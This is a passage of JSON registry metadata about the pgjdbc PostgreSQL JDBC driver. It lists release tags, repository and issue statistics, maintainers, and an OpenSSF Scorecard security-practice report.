L7_1","sha":"2c56fd4ae7a9e300c5c5bba754659949874af2c2","kind":"commit","published_at":"2001-03-19T21:57:09.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1/manifests"},{"name":"REL7_1_BETA3","sha":"a55bb6d16837bda30929f56c9b866bcd98ffe87f","kind":"commit","published_at":"2000-12-28T23:56:46.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1_BETA3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1_BETA3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1_BETA3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA3/manifests"},{"name":"REL7_1_BETA2","sha":"a55bb6d16837bda30929f56c9b866bcd98ffe87f","kind":"commit","published_at":"2000-12-28T23:56:46.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1_BETA2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1_BETA2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1_BETA2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA2/manifests"},{"name":"REL7_1_BETA","sha":"422287392124727a6d1520a004d6892449c3474c","kind":"commit","published_at":"2000-11-25T04:32:12.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1_BETA","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1_BETA","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1_BETA","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA/manifests"},{"name":"REL7_0","sha":"00659bf1e495de76b0444a0baecb12516526595d","kind":"commit","published_at":"2000-05-05T07:35:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_0/manifests"},{"name":"REL6_5","sha":"a82d23e5c013587296f807ff3886359fd4941f96","kind":"commit","published_at":"1999-06-27T11:05:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL6_5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL6_5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL6_5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL6_5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL6_5/manifests"},{"name":"release-6-3","sha":"121396c2d9ba689d98fe0837be59ce628ae62c0e","kind":"commit","published_at":"1998-02-22T18:03:26.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/release-6-3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/release-6-3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@release-6-3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/release-6-3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/release-6-3/manifests"}]},"repo_metadata_updated_at":"2026-03-15T13:13:53.920Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":6.808321414509642,"dependent_packages_count":6.377797149797286,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":6.5930592821534635},"purl":"pkg:golang/github.com/pgjdbc/pgjdbc","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/pgjdbc/pgjdbc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/pgjdbc/pgjdbc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/pgjdbc/pgjdbc/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-15T10:03:57.509Z","issues_count":355,"pull_requests_count":1106,"avg_time_to_close_issue":21320116.11678832,"avg_time_to_close_pull_request":4714478.739514349,"issues_closed_count":136,"pull_requests_closed_count":906,"pull_request_authors_count":132,"issue_authors_count":270,"avg_comments_per_issue":4.892957746478873,"avg_comments_per_pull_request":1.8824593128390597,"merged_pull_requests_count":761,"bot_issues_count":2,"bot_pull_requests_count":46,"past_year_issues_count":63,"past_year_pull_requests_count":348,"past_year_avg_time_to_close_issue":852687.9047619047,"past_year_avg_time_to_close_pull_request":365465.76,"past_year_issues_closed_count":21,"past_year_pull_requests_closed_count":275,"past_year_pull_request_authors_count":29,"past_year_issue_authors_count":53,"past_year_avg_comments_per_issue":2.3333333333333335,"past_year_avg_comments_per_pull_request":0.7097701149425287,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":3,"past_year_merged_pull_requests_count":254,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/issues","maintainers":[{"login":"davecramer","count":194,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/davecramer"},{"login":"vlsi","count":167,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vlsi"},{"login":"jorsol","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jorsol"},{"login":"sehrope","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sehrope"},{"login":"ringerc","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ringerc"},{"login":"bokken","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bokken"},{"login":"praiskup","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/praiskup"},{"login":"pyup-bot","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pyup-bot"}],"active_maintainers":[{"login":"vlsi","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vlsi"},{"login":"davecramer","count":46,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/davecramer"},{"login":"sehrope","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sehrope"},{"login":"jorsol","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jorsol"},{"login":"praiskup","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/praiskup"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fpgjdbc%2Fpgjdbc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fpgjdbc%2Fpgjdbc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fpgjdbc%2Fpgjdbc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fpgjdbc%2Fpgjdbc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fpgjdbc%2Fpgjdbc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fpgjdbc%2Fpgjdbc/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2180425,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":5052595,"name":"org.postgresql:pgjdbc-osgi-test","ecosystem":"maven","description":"PostgreSQL JDBC Driver Pgjdbc-osgi-test","homepage":"https://jdbc.postgresql.org","licenses":"BSD-2-Clause","normalized_licenses":["BSD-2-Clause"],"repository_url":"https://github.com/pgjdbc/pgjdbc","keywords_array":[],"namespace":"org.postgresql","versions_count":12,"first_release_published_at":"2021-10-15T12:57:44.000Z","latest_release_published_at":"2022-06-09T14:54:57.000Z","latest_release_number":"42.4.0","last_synced_at":"2026-06-17T08:00:48.332Z","created_at":"2022-07-27T22:54:56.542Z","updated_at":"2026-06-17T08:00:48.332Z","registry_url":"https://central.sonatype.com/artifact/org.postgresql/pgjdbc-osgi-test/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.postgresql/pgjdbc-osgi-test/","metadata":{"repositories":["https://repo.maven.apache.org/maven2"]},"repo_metadata":{"id":2402865,"uuid":"3370128","full_name":"pgjdbc/pgjdbc","owner":"pgjdbc","description":"Postgresql JDBC Driver","archived":false,"fork":false,"pushed_at":"2026-03-14T19:19:55.000Z","size":46673,"stargazers_count":1696,"open_issues_count":622,"forks_count":924,"subscribers_count":79,"default_branch":"master","last_synced_at":"2026-03-15T03:08:24.429Z","etag":null,"topics":["java","jdbc","postgresql"],"latest_commit_sha":null,"homepage":"https://jdbc.postgresql.org/","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-2-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pgjdbc.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2012-02-06T19:30:35.000Z","updated_at":"2026-03-14T19:19:58.000Z","dependencies_parsed_at":"2023-07-05T17:00:15.760Z","dependency_job_id":"86f905c6-23fb-401f-ba06-fc529694e76e","html_url":"https://github.com/pgjdbc/pgjdbc","commit_stats":{"total_commits":3390,"total_committers":332,"mean_commits":"10.210843373493976","dds":0.8300884955752212,"last_synced_commit":"cf3d8e5ed1bca96873735a8731ed4082132361a5"},"previous_names":[],"tags_count":256,"template":false,"template_full_name":null,"purl":"pkg:github/pgjdbc/pgjdbc","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pgjdbc","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/sbom","scorecard":{"id":355355,"data":{"date":"2025-08-18T08:41:38Z","repo":{"name":"github.com/pgjdbc/pgjdbc","commit":"0002d4b2e9de28af0fe0e63a5821f65ed23e245b"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":7.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 26/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 19 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Token-Permissions","score":9,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'packages' permission set to 'read': .github/workflows/codeql.yml:40","Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:43","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:44","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/gradle-dependency-submit.yaml:18","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release-drafter.yml:22","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:18","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/release.yml:21","Info: topLevel 'contents' permission set to 'read': .github/workflows/buildcache.yml:13","Info: topLevel permissions set to 'read-all': .github/workflows/codeql.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/debezium.yml:7","Info: topLevel 'contents' permission set to 'read': .github/workflows/fedora-copr-build.yml:10","Info: topLevel permissions set to 'read-all': .github/workflows/gradle-dependency-submit.yaml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/gradle-wrapper-validation.yml:5","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:25","Info: topLevel 'contents' permission set to 'read': .github/workflows/nightlysnapshot.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/omni.yml:39","Info: topLevel permissions set to 'read-all': .github/workflows/ossf-scorecard.yaml:20","Info: topLevel permissions set to 'read-all': .github/workflows/pgp-key-maintenance.yaml:6","Info: topLevel permissions set to 'read-all': .github/workflows/release-drafter.yml:12","Warn: no topLevel permission defined: .github/workflows/release.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:152","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:199","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:228","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:235","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:253","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:263","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:272","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:289","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:297","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:312","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:326","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:330","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:344","Warn: downloadThenRun not pinned by hash: .github/workflows/fedora-copr-build.yml:33","Info:  42 out of  42 GitHub-owned GitHubAction dependencies pinned","Info:  20 out of  20 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact REL42.7.7 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/221733787","Warn: release artifact REL42.7.6 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/194763152","Warn: release artifact REL42.7.5 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/171559336","Warn: release artifact REL42.7.4 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/147455529","Warn: release artifact REL42.7.3 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/132920423","Warn: release artifact REL42.7.7 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/221733787","Warn: release artifact REL42.7.6 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/194763152","Warn: release artifact REL42.7.5 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/171559336","Warn: release artifact REL42.7.4 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/147455529","Warn: release artifact REL42.7.3 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/132920423"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":10,"reason":"SAST tool is run on all commits","details":["Info: SAST configuration detected: CodeQL","Info: all commits (30) are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: BSD 2-Clause \"Simplified\" License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":3,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'master'","Info: 'allow deletion' disabled on branch 'release/42.5.x'","Info: 'allow deletion' disabled on branch 'release/42.4.x'","Info: 'allow deletion' disabled on branch 'release/42.3.x'","Info: 'force pushes' disabled on branch 'master'","Info: 'force pushes' disabled on branch 'release/42.5.x'","Info: 'force pushes' disabled on branch 'release/42.4.x'","Info: 'force pushes' disabled on branch 'release/42.3.x'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'master'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'release/42.5.x'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'release/42.4.x'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'release/42.3.x'","Warn: 'stale review dismissal' is disabled on branch 'master'","Warn: 'stale review dismissal' is disabled on branch 'release/42.5.x'","Warn: 'stale review dismissal' is disabled on branch 'release/42.4.x'","Warn: 'stale review dismissal' is disabled on branch 'release/42.3.x'","Warn: branch 'master' does not require approvers","Warn: branch 'release/42.5.x' does not require approvers","Warn: branch 'release/42.4.x' does not require approvers","Warn: branch 'release/42.3.x' does not require approvers","Warn: codeowners review is not required on branch 'master'","Warn: codeowners review is not required on branch 'release/42.5.x'","Warn: codeowners review is not required on branch 'release/42.4.x'","Warn: codeowners review is not required on branch 'release/42.3.x'","Warn: 'last push approval' is disabled on branch 'master'","Warn: 'last push approval' is disabled on branch 'release/42.5.x'","Warn: 'last push approval' is disabled on branch 'release/42.4.x'","Warn: 'last push approval' is disabled on branch 'release/42.3.x'","Warn: 'up-to-date branches' is disabled on branch 'master'","Warn: 'up-to-date branches' is disabled on branch 'release/42.5.x'","Warn: 'up-to-date branches' is disabled on branch 'release/42.4.x'","Warn: 'up-to-date branches' is disabled on branch 'release/42.3.x'","Info: status check found to merge onto on branch 'master'","Info: status check found to merge onto on branch 'release/42.5.x'","Info: status check found to merge onto on branch 'release/42.4.x'","Info: status check found to merge onto on branch 'release/42.3.x'","Info: PRs are required in order to make changes on branch 'master'","Info: PRs are required in order to make changes on branch 'release/42.5.x'","Info: PRs are required in order to make changes on branch 'release/42.4.x'","Info: PRs are required in order to make changes on branch 'release/42.3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"30 out of 30 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 34 contributing companies or organizations","details":["Info: found contributions from: 2ndQuadrant, AXLEproject, JavaMoney, altametris, autostyle, aws, cerner, csutils, devexp-db, edb, enterprisedb, fedora-copr, gnulib-modules, jackdb, jugnicaragua, konflux-ci, libusual, lonocloud, mend, mojohaus, netceteragroup, netcracker, ngs-doo, oracle, pgbouncer, pgjdbc, postgres, python-progress, redhatofficial, release-engineering, roiai-org, rpm-software-management, w4software, yandex"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}}]},"last_synced_at":"2025-08-18T09:24:36.671Z","repository_id":2402865,"created_at":"2025-08-18T09:24:36.672Z","updated_at":"2025-08-18T09:24:36.672Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30540718,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-15T07:17:37.589Z","status":"ssl_error","status_checked_at":"2026-03-15T07:17:31.738Z","response_time":61,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pgjdbc","name":"Postgresql JDBC","uuid":"1371956","kind":"organization","description":"Official JDBC driver for PostgreSQL","email":"pgsql-jdbc@postgresql.org","website":"http://jdbc.postgresql.org","location":"Canada","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/1371956?v=4","repositories_count":12,"last_synced_at":"2025-05-18T13:01:52.520Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/pgjdbc","funding_links":[],"total_stars":2714,"followers":80,"following":0,"created_at":"2022-11-03T09:29:51.190Z","updated_at":"2025-05-18T13:01:52.520Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pgjdbc","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pgjdbc/repositories"},"tags":[]},"repo_metadata_updated_at":"2026-03-15T13:14:17.349Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":35,"rankings":{"downloads":null,"dependent_repos_count":3.8382527840847662,"dependent_packages_count":50.15146812962388,"stargazers_count":10.616563151972386,"forks_count":6.4499465407671694,"docker_downloads_count":null,"average":17.76405765161205},"purl":"pkg:maven/org.postgresql/pgjdbc-osgi-test","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.postgresql:pgjdbc-osgi-test","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.postgresql:pgjdbc-osgi-test","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.postgresql:pgjdbc-osgi-test/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-15T10:03:57.509Z","issues_count":355,"pull_requests_count":1106,"avg_time_to_close_issue":21320116.11678832,"avg_time_to_close_pull_request":4714478.739514349,"issues_closed_count":136,"pull_requests_closed_count":906,"pull_request_authors_count":132,"issue_authors_count":270,"avg_comments_per_issue":4.892957746478873,"avg_comments_per_pull_request":1.8824593128390597,"merged_pull_requests_count":761,"bot_issues_count":2,"bot_pull_requests_count":46,"past_year_issues_count":63,"past_year_pull_requests_count":348,"past_year_avg_time_to_close_issue":852687.9047619047,"past_year_avg_time_to_close_pull_request":365465.76,"past_year_issues_closed_count":21,"past_year_pull_requests_closed_count":275,"past_year_pull_request_authors_count":29,"past_year_issue_authors_count":53,"past_year_avg_comments_per_issue":2.3333333333333335,"past_year_avg_comments_per_pull_request":0.7097701149425287,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":3,"past_year_merged_pull_requests_count":254,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/issues","maintainers":[{"login":"davecramer","count":194,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/davecramer"},{"login":"vlsi","count":167,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vlsi"},{"login":"jorsol","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jorsol"},{"login":"sehrope","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sehrope"},{"login":"ringerc","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ringerc"},{"login":"bokken","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bokken"},{"login":"praiskup","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/praiskup"},{"login":"pyup-bot","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pyup-bot"}],"active_maintainers":[{"login":"vlsi","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vlsi"},{"login":"davecramer","count":46,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/davecramer"},{"login":"sehrope","